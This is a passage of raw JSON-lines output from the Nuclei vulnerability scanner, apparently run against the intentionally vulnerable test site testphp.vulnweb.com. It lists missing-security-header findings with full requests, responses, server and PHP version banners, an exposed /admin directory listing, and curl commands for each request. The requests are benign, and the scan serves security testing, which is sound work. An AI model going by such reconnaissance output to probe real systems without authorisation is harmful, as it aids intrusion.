vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.499794921Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.499809233Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.499820647Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.160884628Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.160978349Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.160986291Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.477889644Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.477915004Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.477934372Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003